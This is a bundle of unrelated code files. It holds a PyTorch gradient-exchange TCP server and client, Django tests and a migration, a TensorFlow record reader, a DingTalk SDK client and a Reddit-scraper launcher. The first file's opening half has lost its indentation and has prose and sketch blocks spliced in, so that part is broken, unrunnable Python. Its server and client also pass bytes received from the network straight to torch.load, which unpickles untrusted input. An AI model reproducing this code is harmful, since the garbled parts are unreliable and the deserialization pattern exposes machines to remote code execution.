self.SERVER = SERVER
self.PORT = PORT
self.NUM_CLIENTS = NUM_CLIENTS
self.GRADIENT_SIZE = GRADIENT_SIZE
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.END_OF_MESSAGE = torch.tensor(float("inf"))
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self.SEND_BUF_SIZE = 4096
# self.RECV_BUF_SIZE = 4096
#
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_SNDBUF,
# self.SEND_BUF_SIZE)
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_RCVBUF,
# self.RECV_BUF_SIZE)
self.server.bind(self.ADDR)
self.accumulated_gradient = torch.zeros(self.GRADIENT_SIZE)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor, conn):
encoded_message = self.encode(tensor)
conn.send(encoded_message)
# time.sleep(self.DELAY)
# self.send_EOT(conn)
def send_EOT(self, conn):
encoded_message = self.encode(self.END_OF_MESSAGE)
conn.send(encoded_message)
def receive(self, conn, addr):
        length = None
        buffer = bytearray()
        readnext = True
        while readnext:
            msg = conn.recv(BUFFER)
            if not msg:
                # peer closed the connection before a full message arrived
                break
            buffer += msg
            if length is None:
                # wait until the "<payload_size>:" header is complete
                if b":" not in buffer:
                    continue
                length_str, _, buffer = buffer.partition(b":")
                length = int(length_str)
            if len(buffer) >= length:
                # full payload received; drop any trailing bytes
                buffer = buffer[:length]
                readnext = False
msg = self.decode(buffer)
print(f"[{addr}] {msg}")
gradient = msg
self.accumulated_gradient += gradient
return
def start(self):
self.server.listen()
print(f"[LISTENING] Server is listening on {self.SERVER}")
try:
clients = []
client_count = 0
while True:
conn, addr = self.server.accept()
clients.append(conn)
client_count += 1
thread = threading.Thread(target=self.receive, args=(conn, addr))
thread.start()
thread.join()
# print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
if threading.activeCount() == 1 and client_count == self.NUM_CLIENTS:
for client in clients:
self.send(self.accumulated_gradient, client)
client.shutdown(1)
client.close()
clients = []
client_count = 0
self.accumulated_gradient.zero_()
except KeyboardInterrupt:
self.stop()
def stop(self):
self.server.shutdown(1)
self.server.close()
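# encode()/decode() frame every tensor as "<payload_size>:<payload>" so the
# receiver knows how many bytes to read from the stream. A torch-free sketch
# of that framing round-trip (a plain byte string stands in for the
# serialized tensor):

```python
payload = b"serialized-tensor-bytes"
frame = str(len(payload)).encode() + b":" + payload   # what encode() emits

length_str, _, body = frame.partition(b":")           # what receive() parses
length = int(length_str)
print(body[:length] == payload)  # True
```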
class TCPClient:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
GRADIENT_SIZE=14728266,
DELAY=5e-3,
SEED=42,
):
self.SERVER = SERVER
self.PORT = PORT
self.GRADIENT_SIZE = GRADIENT_SIZE
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.DISCONNECT_MESSAGE = torch.tensor(float("inf"))
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect(self.ADDR)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor):
message = self.encode(tensor)
self.client.send(message)
# time.sleep(self.DELAY)
# self.send_EOT()
def send_EOT(self):
encoded_message = self.encode(self.DISCONNECT_MESSAGE)
        self.client.send(encoded_message)  # socket is already connected; plain send() is idiomatic
def receive(self):
        length = None
        buffer = bytearray()
        readnext = True
        while readnext:
            msg = self.client.recv(BUFFER)
            if not msg:
                # server closed the connection before a full message arrived
                break
            buffer += msg
            if length is None:
                # wait until the "<payload_size>:" header is complete
                if b":" not in buffer:
                    continue
                length_str, _, buffer = buffer.partition(b":")
                length = int(length_str)
            if len(buffer) >= length:
                # full payload received; drop any trailing bytes
                buffer = buffer[:length]
                readnext = False
msg = self.decode(buffer)
return msg
class TCPKServer:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
NUM_CLIENTS=1,
GRADIENT_SIZE=14728266,
K=10000,
DELAY=5e-3,
SEED=42,
):
self.SERVER = SERVER
self.PORT = PORT
self.NUM_CLIENTS = NUM_CLIENTS
self.K = K
self.GRADIENT_SIZE = GRADIENT_SIZE
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.END_OF_MESSAGE = torch.tensor(float("inf"))
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self.SEND_BUF_SIZE = 4096
# self.RECV_BUF_SIZE = 4096
#
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_SNDBUF,
# self.SEND_BUF_SIZE)
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_RCVBUF,
# self.RECV_BUF_SIZE)
self.server.bind(self.ADDR)
self._indices_queue = []
self.accumulated_gradient = torch.zeros(self.GRADIENT_SIZE)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor, conn):
encoded_message = self.encode(tensor)
conn.send(encoded_message)
# time.sleep(self.DELAY)
# self.send_EOT(conn)
def send_EOT(self, conn):
encoded_message = self.encode(self.END_OF_MESSAGE)
conn.send(encoded_message)
def receive(self, conn, addr):
        length = None
        buffer = bytearray()
        readnext = True
        while readnext:
            msg = conn.recv(BUFFER)
            if not msg:
                # peer closed the connection before a full message arrived
                break
            buffer += msg
            if length is None:
                # wait until the "<payload_size>:" header is complete
                if b":" not in buffer:
                    continue
                length_str, _, buffer = buffer.partition(b":")
                length = int(length_str)
            if len(buffer) >= length:
                # full payload received; drop any trailing bytes
                buffer = buffer[:length]
                readnext = False
msg = self.decode(buffer)
print(f"[{addr}] {msg}")
indices = msg[:, 0].long()
gradient = msg[:, 1]
self.accumulated_gradient[indices] += gradient
return

    def start(self):
        self.server.listen()
        print(f"[LISTENING] Server is listening on {self.SERVER}")
        try:
            clients = []
            client_count = 0
            while True:
                conn, addr = self.server.accept()
                clients.append(conn)
                client_count += 1
                thread = threading.Thread(target=self.receive, args=(conn, addr))
                thread.start()
                thread.join()
                # print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
                if threading.activeCount() == 1 and client_count == self.NUM_CLIENTS:
                    if not self._indices_queue:
                        # set_seed() is defined earlier in the module (not shown in this excerpt).
                        set_seed(self.SEED)
                        self._indices_queue = torch.randperm(self.GRADIENT_SIZE).split(self.K)
                        self._indices_queue = list(self._indices_queue)
                    RandK_indices = self._indices_queue.pop().long()
                    RandK_flat_grad = self.accumulated_gradient[RandK_indices]
                    accumulated_grad_indices = torch.vstack([RandK_indices, RandK_flat_grad]).T
                    print(RandK_indices)
                    for client in clients:
                        self.send(accumulated_grad_indices, client)
                        client.shutdown(1)
                        client.close()
                    clients = []
                    client_count = 0
                    self.accumulated_gradient.zero_()
        except KeyboardInterrupt:
            self.stop()

    def stop(self):
        self.server.shutdown(1)
        self.server.close()
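The Rand-K step in `start()` above shuffles all gradient coordinates once per epoch and hands out one fixed-size chunk of indices per round. The chunking logic can be sketched without torch (function and parameter names here are illustrative, not part of the original class):

```python
import random


def rand_k_chunks(size: int, k: int, seed: int):
    """Shuffle [0, size) once and split the permutation into chunks of k indices."""
    rng = random.Random(seed)
    perm = list(range(size))
    rng.shuffle(perm)
    return [perm[i:i + k] for i in range(0, len(perm), k)]


chunks = rand_k_chunks(size=10, k=4, seed=42)
```

Every coordinate appears in exactly one chunk, so over `size / k` rounds the full gradient is covered, which mirrors what the queue of `torch.randperm(...).split(self.K)` pieces achieves.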


class TCPKClient:
    def __init__(
        self,
        SERVER=socket.gethostbyname(socket.gethostname()),
        PORT=5050,
        GRADIENT_SIZE=14728266,
        K=10000,
        DELAY=5e-3,
        SEED=42,
    ):
        self.SERVER = SERVER
        self.PORT = PORT
        self.GRADIENT_SIZE = GRADIENT_SIZE
        self.K = K
        self.DELAY = DELAY
        self.SEED = SEED
        self.ADDR = (SERVER, PORT)
        self.DISCONNECT_MESSAGE = torch.tensor(float("inf"))
        self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.client.connect(self.ADDR)

    def encode(self, tensor):
        # Serialize the tensor and prefix it with an ASCII byte count and a ":" separator.
        file = io.BytesIO()
        torch.save(tensor, file)
        packet_size = len(file.getvalue())
        header = "{0}:".format(packet_size)
        header = bytes(header.encode())
        encoded = bytearray()
        encoded += header
        file.seek(0)
        encoded += file.read()
        return encoded

    def decode(self, buffer):
        tensor = torch.load(io.BytesIO(buffer))
        return tensor

    def send(self, tensor):
        message = self.encode(tensor)
        self.client.send(message)
        # time.sleep(self.DELAY)
        # self.send_EOT()

    def send_EOT(self):
        encoded_message = self.encode(self.DISCONNECT_MESSAGE)
        # sendto() with an address is invalid on an already-connected TCP socket; plain send() is the right call.
        self.client.send(encoded_message)

    def receive(self):
        # Reassemble one length-prefixed message of the form b"<length>:<payload>"
        # (same fix as the server-side receive: exit once the full payload has arrived).
        length = None
        buffer = bytearray()
        while True:
            msg = self.client.recv(BUFFER)
            if not msg:
                break
            buffer += msg
            if length is None:
                if b":" not in buffer:
                    continue  # header not complete yet
                length_str, ignored, buffer = buffer.partition(b":")
                length = int(length_str)
            if len(buffer) >= length:
                break  # full payload received
        msg = self.decode(bytes(buffer[:length]))
        return msg
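Both classes above frame every message as an ASCII byte count, a `:` separator, and the serialized tensor. The same wire format can be demonstrated without torch, using `pickle` in place of `torch.save` (the function names here are illustrative, not part of the original classes):

```python
import pickle


def encode(obj) -> bytes:
    """Frame a picklable object as b'<length>:<payload>'."""
    payload = pickle.dumps(obj)
    return str(len(payload)).encode() + b":" + payload


def decode_stream(buffer: bytes):
    """Split one framed message off the front of a byte buffer.

    Returns (object, remaining_bytes), or (None, buffer) if the frame
    is still incomplete and more bytes must be received.
    """
    length_str, _, rest = buffer.partition(b":")
    length = int(length_str)
    if len(rest) < length:
        return None, buffer  # incomplete: wait for more bytes
    return pickle.loads(rest[:length]), rest[length:]


framed = encode([1.0, 2.0, 3.0])
obj, leftover = decode_stream(framed)
```

Because TCP delivers a byte stream rather than discrete messages, the explicit length header is what lets the receiver know where one tensor ends and the next begins.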


# ==== File: tests/ozpcenter_api/test_api_listing_feedback.py (repo: emosher/ozp-backend, license: Apache-2.0) ====
from django.test import override_settings
from ozpcenter.scripts import sample_data_generator as data_gen
from tests.ozp.cases import APITestCase
from tests.ozpcenter.helper import APITestHelper


@override_settings(ES_ENABLED=False)
class ListingFeedbackApiTest(APITestCase):
    @classmethod
    def setUpTestData(cls):
        data_gen.run()

    def setUp(self):
        pass
    def test_no_feedback_listing(self):
        url = '/api/listing/1/feedback/'
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=404)
        self.assertEqual(response.data['feedback'], 0)

    def test_positive_feedback_listing(self):
        # Create a positive feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": 1}
        APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
        self.assertEqual(response.data['feedback'], 1)

        # Check with a different beta group user to see if feedback exists for said user
        response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=404)
        self.assertEqual(response.data['feedback'], 0)

    def test_negative_feedback_listing(self):
        # Create a negative feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": -1}
        APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
        self.assertEqual(response.data['feedback'], -1)

        # Check with a different beta group user to see if feedback exists for said user
        response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=404)
        self.assertEqual(response.data['feedback'], 0)

    def test_two_user_positive_feedback_listing(self):
        # Create a positive feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": 1}
        APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
        self.assertEqual(response.data['feedback'], 1)

        # Create a positive feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": 1}
        APITestHelper.request(self, url, 'POST', data=data, username='betaraybill', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=200)
        self.assertEqual(response.data['feedback'], 1)

    def test_two_user_negative_feedback_listing(self):
        # Create a negative feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": -1}
        APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
        self.assertEqual(response.data['feedback'], -1)

        # Create a negative feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": -1}
        APITestHelper.request(self, url, 'POST', data=data, username='betaraybill', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=200)
        self.assertEqual(response.data['feedback'], -1)

    def test_two_user_diff_feedback_listing(self):
        # Create a positive feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": 1}
        APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
        self.assertEqual(response.data['feedback'], 1)

        # Create a negative feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": -1}
        APITestHelper.request(self, url, 'POST', data=data, username='betaraybill', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=200)
        self.assertEqual(response.data['feedback'], -1)

    def test_delete_listing_feedback(self):
        # Create a positive feedback
        url = '/api/listing/1/feedback/'
        data = {"feedback": 1}
        APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)

        # Check to see if created
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
        self.assertEqual(response.data['feedback'], 1)

        # DELETE
        url = '/api/listing/1/feedback/1/'
        APITestHelper.request(self, url, 'DELETE', username='bettafish', status_code=204)

        # VERIFY
        url = '/api/listing/1/feedback/'
        response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=404)
        self.assertEqual(response.data['feedback'], 0)

    def test_delete_listing_non_existing_feedback(self):
        url = '/api/listing/1/feedback/1/'
        response = APITestHelper.request(self, url, 'DELETE', username='bettafish', status_code=404)
        # TODO: ExceptionUnitTestHelper
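The positive/negative test pairs above repeat the same create-then-read sequence with only the feedback value changed. Duplication like this can be collapsed with `subTest`, sketched here against plain `unittest` rather than the project's `APITestCase` (the in-memory dict stands in for the POST + GET round trip, which would need a live test server):

```python
import unittest


class FeedbackValues(unittest.TestCase):
    def test_feedback_round_trip(self):
        # Each feedback value exercises the same create-then-read sequence;
        # subTest reports each value's failure independently.
        for value in (1, -1):
            with self.subTest(feedback=value):
                stored = {"feedback": value}  # stand-in for the API call
                self.assertEqual(stored["feedback"], value)


result = unittest.TextTestRunner(verbosity=0).run(
    unittest.defaultTestLoader.loadTestsFromTestCase(FeedbackValues)
)
```

Keeping each scenario as its own named test (as the file does) gives clearer failure output; `subTest` trades that for less repetition.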


# ==== File: usersec/migrations/0010_hpcprojectchangerequest_description_and_more.py (repo: bihealth/hpc-access, license: MIT) ====
# Generated by Django 4.0.3 on 2022-04-22 10:57
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ("usersec", "0009_hpcproject_hpcprojectchangerequest_and_more"),
    ]

    operations = [
        migrations.AddField(
            model_name="hpcprojectchangerequest",
            name="description",
            field=models.CharField(
                help_text="Additional information about the user", max_length=512, null=True
            ),
        ),
        migrations.AddField(
            model_name="hpcprojectchangerequestversion",
            name="description",
            field=models.CharField(
                help_text="Additional information about the user", max_length=512, null=True
            ),
        ),
        migrations.AddField(
            model_name="hpcprojectcreaterequest",
            name="description",
            field=models.CharField(
                default="some description",
                help_text="Additional information about the user",
                max_length=512,
            ),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="hpcprojectcreaterequest",
            name="name",
            field=models.CharField(
                default="some-project", help_text="Description of the groups work", max_length=512
            ),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="hpcprojectcreaterequestversion",
            name="description",
            field=models.CharField(
                default="some description",
                help_text="Additional information about the user",
                max_length=512,
            ),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="hpcprojectcreaterequestversion",
            name="name",
            field=models.CharField(
                default="some-project", help_text="Description of the groups work", max_length=512
            ),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name="hpcproject",
            name="group",
            field=models.ForeignKey(
                help_text="Group that requested project. Group PI is owner of project",
                on_delete=django.db.models.deletion.CASCADE,
                related_name="%(class)s",
                to="usersec.hpcgroup",
            ),
        ),
        migrations.AlterField(
            model_name="hpcprojectcreaterequest",
            name="group",
            field=models.ForeignKey(
                help_text="Group the request belongs to",
                on_delete=django.db.models.deletion.CASCADE,
                related_name="%(class)s",
                to="usersec.hpcgroup",
            ),
        ),
        migrations.AlterField(
            model_name="hpcprojectcreaterequestversion",
            name="group",
            field=models.ForeignKey(
                help_text="Group the request belongs to",
                on_delete=django.db.models.deletion.CASCADE,
                related_name="%(class)s",
                to="usersec.hpcgroup",
            ),
        ),
        migrations.AlterField(
            model_name="hpcprojectversion",
            name="group",
            field=models.ForeignKey(
                help_text="Group that requested project. Group PI is owner of project",
                on_delete=django.db.models.deletion.CASCADE,
                related_name="%(class)s",
                to="usersec.hpcgroup",
            ),
        ),
    ]


# ==== File: tfrecords_handler/non_moving_window/tfrecord_reader.py (repo: HansikaPH/time-series-forecasting, license: MIT) ====
import tensorflow as tf


class TFRecordReader:

    def train_data_parser(self, serialized_example):
        context_parsed, sequence_parsed = tf.parse_single_sequence_example(
            serialized_example,
            context_features=({
                "sequence_length": tf.FixedLenFeature([], dtype=tf.int64)
            }),
            sequence_features=({
                "input": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
                "output": tf.FixedLenSequenceFeature([1], dtype=tf.float32)
            })
        )
        return context_parsed["sequence_length"], sequence_parsed["input"], sequence_parsed["output"]

    def validation_data_parser(self, serialized_example):
        context_parsed, sequence_parsed = tf.parse_single_sequence_example(
            serialized_example,
            context_features=({
                "sequence_length": tf.FixedLenFeature([], dtype=tf.int64)
            }),
            sequence_features=({
                "input": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
                "output": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
                "metadata": tf.FixedLenSequenceFeature([1], dtype=tf.float32)
            })
        )
        return context_parsed["sequence_length"], sequence_parsed["input"], sequence_parsed["output"], sequence_parsed[
            "metadata"]

    def test_data_parser(self, serialized_example):
        context_parsed, sequence_parsed = tf.parse_single_sequence_example(
            serialized_example,
            context_features=({
                "sequence_length": tf.FixedLenFeature([], dtype=tf.int64)
            }),
            sequence_features=({
                "input": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
                "metadata": tf.FixedLenSequenceFeature([1], dtype=tf.float32)
            })
        )
        return context_parsed["sequence_length"], sequence_parsed["input"], sequence_parsed["metadata"]


# ==== File: dingtalk/python/alibabacloud_dingtalk/wms_1_0/client.py (repo: aliyun/dingtalk-sdk, license: Apache-2.0) ====
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore

from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.wms_1_0 import models as dingtalkwms__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient


class Client(OpenApiClient):
    """
    *\
    """
    def __init__(
        self,
        config: open_api_models.Config,
    ):
        super().__init__(config)
        self._endpoint_rule = ''
        if UtilClient.empty(self._endpoint):
            self._endpoint = 'api.dingtalk.com'

    def query_goods_list(
        self,
        request: dingtalkwms__1__0_models.QueryGoodsListRequest,
    ) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
        runtime = util_models.RuntimeOptions()
        headers = dingtalkwms__1__0_models.QueryGoodsListHeaders()
        return self.query_goods_list_with_options(request, headers, runtime)

    async def query_goods_list_async(
        self,
        request: dingtalkwms__1__0_models.QueryGoodsListRequest,
    ) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
        runtime = util_models.RuntimeOptions()
        headers = dingtalkwms__1__0_models.QueryGoodsListHeaders()
        return await self.query_goods_list_with_options_async(request, headers, runtime)

    def query_goods_list_with_options(
        self,
        request: dingtalkwms__1__0_models.QueryGoodsListRequest,
        headers: dingtalkwms__1__0_models.QueryGoodsListHeaders,
        runtime: util_models.RuntimeOptions,
    ) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
        UtilClient.validate_model(request)
        query = {}
        if not UtilClient.is_unset(request.next_token):
            query['nextToken'] = request.next_token
        if not UtilClient.is_unset(request.max_results):
            query['maxResults'] = request.max_results
        if not UtilClient.is_unset(request.start_time_in_mills):
            query['startTimeInMills'] = request.start_time_in_mills
        if not UtilClient.is_unset(request.end_time_in_mills):
            query['endTimeInMills'] = request.end_time_in_mills
        real_headers = {}
        if not UtilClient.is_unset(headers.common_headers):
            real_headers = headers.common_headers
        if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
            real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
        req = open_api_models.OpenApiRequest(
            headers=real_headers,
            query=OpenApiUtilClient.query(query)
        )
        return TeaCore.from_map(
            dingtalkwms__1__0_models.QueryGoodsListResponse(),
            self.do_roarequest('QueryGoodsList', 'wms_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/wms/goods', 'json', req, runtime)
        )

    async def query_goods_list_with_options_async(
        self,
        request: dingtalkwms__1__0_models.QueryGoodsListRequest,
        headers: dingtalkwms__1__0_models.QueryGoodsListHeaders,
        runtime: util_models.RuntimeOptions,
    ) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
        UtilClient.validate_model(request)
        query = {}
        if not UtilClient.is_unset(request.next_token):
            query['nextToken'] = request.next_token
        if not UtilClient.is_unset(request.max_results):
            query['maxResults'] = request.max_results
        if not UtilClient.is_unset(request.start_time_in_mills):
            query['startTimeInMills'] = request.start_time_in_mills
        if not UtilClient.is_unset(request.end_time_in_mills):
            query['endTimeInMills'] = request.end_time_in_mills
        real_headers = {}
        if not UtilClient.is_unset(headers.common_headers):
            real_headers = headers.common_headers
        if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
            real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
        req = open_api_models.OpenApiRequest(
            headers=real_headers,
            query=OpenApiUtilClient.query(query)
        )
        return TeaCore.from_map(
            dingtalkwms__1__0_models.QueryGoodsListResponse(),
            await self.do_roarequest_async('QueryGoodsList', 'wms_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/wms/goods', 'json', req, runtime)
        )
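The `*_with_options` methods above map request attributes into a query dict, skipping any field that is unset. The generated SDK spells out one `is_unset` check per field; the same filtering can be sketched generically (this helper is illustrative and not part of the SDK, which uses `UtilClient.is_unset` rather than a plain `None` check):

```python
def build_query(request: dict, field_map: dict) -> dict:
    """Copy only the fields that are actually set, renaming keys on the way."""
    return {
        wire_name: request[attr]
        for attr, wire_name in field_map.items()
        if request.get(attr) is not None
    }


query = build_query(
    {"next_token": "abc", "max_results": None},
    {"next_token": "nextToken", "max_results": "maxResults"},
)
```

Code generators tend to prefer the explicit per-field form anyway, since each generated check maps one-to-one onto a field in the API specification.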


# ==== File: master.py (repo: pjha1994/Scrape_reddit, license: Apache-2.0) ====
import subprocess
import httplib2
import requests
from datetime import datetime

FORMAT = '%d-%m-%Y %H:%M:%S'
my = open('log.txt', 'a', encoding='utf-8')


def test_internet():
    # Block until an HTTP request to google.com succeeds, logging start and success times.
    my.write('\nin test_internet' + '-------------------------' + datetime.now().strftime(FORMAT) + '\n')
    while True:
        try:
            http = httplib2.Http()
            status, response = http.request("https://www.google.com")
            my.write('\nSUCCESS test_internet' + '-------------------------' + datetime.now().strftime(FORMAT) + '\n\n')
            break
        except Exception:  # a bare except would also swallow KeyboardInterrupt; retry only on errors
            continue
    my.close()


test_internet()

# Read the last run number from mytext.txt, increment it, and persist it for the next run.
t = open("mytext.txt", 'r')
i = t.read()
temp = int(i)
temp = temp + 1
t.close()
t = open("mytext.txt", 'w')
t.write(str(temp))
t.close()
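The read-increment-write counter above can be wrapped in a small helper (illustrative only; `master.py` inlines the same steps and, unlike this sketch, assumes `mytext.txt` already exists):

```python
import tempfile
from pathlib import Path


def next_run_id(counter_file: str) -> int:
    """Read the previous run id from disk, increment it, and write it back."""
    path = Path(counter_file)
    current = int(path.read_text()) if path.exists() else 0
    path.write_text(str(current + 1))
    return current + 1


# Demonstrate against a throwaway counter file.
with tempfile.TemporaryDirectory() as tmp:
    counter = str(Path(tmp) / "mytext.txt")
    first = next_run_id(counter)   # -> 1
    second = next_run_id(counter)  # -> 2
```

Persisting the counter lets each scraper invocation (passed as `str(i)` to every `subprocess.call` below) tag its output with a unique run number across restarts.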
#trial
#subprocess.call(["python","worldnews_fast.py",str(i),'AskAnthropology','AskComputerScience','AskElectronics','AskEngineers','AskHR','AskHistorians','AskMen','AskPhysics','AskReddit','AskScienceDiscussion'],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),'24hoursupport','3amjokes','ADHD','AMA','AcademicPhilosophy','AcademicPsychology','Aerospace','Android','AndroidQuestions','Anger','Anxiety'],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),'ProgrammerHumor','Proofreading','Python','RapeCounseling','RetailManagement','STEMdents','SWORDS','SWResources','SampleSize','SanctionedSuicide','Seduction'],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#subprocess.call(["python","worldnews_fast.py",str(i),],shell=True)
#30 each whole list
subprocess.call(["python","worldnews_fast.py",str(i),"24hoursupport","3amjokes","ADHD","AMA","AcademicPhilosophy","AcademicPsychology","Aerospace","Android","AndroidQuestions","Anger","Anxiety","AskAnthropology","AskComputerScience","AskElectronics","AskEngineers","AskHR","AskHistorians","AskMen","AskPhysics","AskReddit","AskScienceDiscussion","AskScienceFiction","AskSocialScience","AskWomen","Ask_Politics","Bash","BehavioralEconomics","BigDataJobs","BipolarReddit","CAD","C_Programming"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"ComputerScience","Confession","CoverTheWorld","Cplusplus","CppForbeginners","CrappyDesign","CrazyIdeas","DIY","DIYCompSci","DailyProgrammer","DeadBedrooms","DebateReligion","DecidingToBeBetter","DigitalNomad","DoesNotTranslate","ECE","Economics","EngineeringStudents","Entrepreneur","ExNoContact","FEA","FE_Exam","Feminism","FluidMechanics","Foodforthought","FoundWords","Freethought","GetMotivated","GetStudying","GraphicsProgramming","HITsWorthTurkingFor","HTMLBattles"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"HomeworkHelp","HowsYourJob","IAmA","IOPsychology","InternetIsBeautiful","LaTeX","LanguageLearning","LearnANewLanguage","LearnJava","LearnJavaScript","LifeProTips","LinguisticsHumor","LongDistance","MachineLearning","Manufacturing","MathHelp","Meditation","NetworkingJobs","Neuropsychology","NoStupidQuestions","ObjectiveC","PCMasterRace","PLC","PhilosophyofScience","PhsychologicalTricks","PoliticalDiscussion","Polyamory","PrintedCircuitBoard","Progether","ProgrammerHumor","Proofreading","Python"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"RapeCounseling","RetailManagement","STEMdents","SWORDS","SWResources","SampleSize","SanctionedSuicide","Seduction","SiblingSupport","Statistics","SuicideWatch","Swift","SysadminJobs","TechNews","ThermalPerformance","Tinder","TinyCode","TowerOfBabel","TrueAskReddit","TrueReddit","Unix","VentureBiotech","WeMetOnline","Web_Development","WhatsTheWord","YoungJobs","academicpsychology","academicpublishing","accounting","advice","androiddev","translator"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"answers","asklinguistics","askmath","askphotography","askreddit","askscience","assistance","astronomy","audiology","autism","badcode","badlinguistics","beermoney","behavioralmedicine","behaviortherapy","bestof","bestofTLDR","bioengineering","biology","biotech","bodybuilding","bookquotes","books","breadboard","bugs","buildapc","business","careerguidance","cfd","changemyview","chemicalengineering","chipdesign"],shell=True)
subprocess.call(["python","worldnews_fast.py",str(i),"civilengineering","cloudcomputing","coding","coffeescript","cogneuro","cogneurocogsci","cognitivelinguistics","cogsci","compilers","complexsystems","compling","compression","compsci","computerforensics","computers","computerscience","conlangs","conspiracy","construction","cosmology","coursearea","cpp","cpp_questions","crypto","cryptography","cs50","csbooks","cscareerquestions","csharp","css","dae","dailyprogrammer"],shell=True)
